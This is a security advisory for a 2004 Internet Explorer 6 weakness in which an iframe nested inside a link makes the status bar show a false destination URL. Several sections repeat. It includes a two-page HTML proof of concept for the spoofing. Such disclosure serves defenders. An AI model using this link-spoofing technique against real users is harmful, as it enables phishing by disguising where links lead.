Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
BID:11590
Info
Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
| Bugtraq ID: | 11590 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 02 2004 12:00AM |
| Updated: | Nov 02 2004 12:00AM |
| Credit: | Discovery of this weakness is credited to Benjamin Tobias Franz. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to originate from a trusted location.
This vulnerability is reported to affect Internet Explorer 6, other versions might also be affected.
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to originate from a trusted location.
This vulnerability is reported to affect Internet Explorer 6, other versions might also be affected.
Exploit / POC
Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
The following example is available:
HTML code for page #1 called "btf.htm":
<a href="http://www.microsoft.com/">
<iframe src="./btf-spoofing.htm" frameborder="0" scrolling="no" width="70"
height="25" marginheight="0" marginwidth="0"></iframe>
</a>
HTML code for page #2 called "btf-spoofing.htm":
<a href="http://www.google.com/" target="_top">Click here</a>
The following example is available:
HTML code for page #1 called "btf.htm":
<a href="http://www.microsoft.com/">
<iframe src="./btf-spoofing.htm" frameborder="0" scrolling="no" width="70"
height="25" marginheight="0" marginwidth="0"></iframe>
</a>
HTML code for page #2 called "btf-spoofing.htm":
<a href="http://www.google.com/" target="_top">Click here</a>
Solution / Fix
Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness
References:
References:
- URL spoofing bug (with iframes) in Microsoft Internet Explorer (11/02/2004) (Benjamin Tobias Franz <[email protected]>)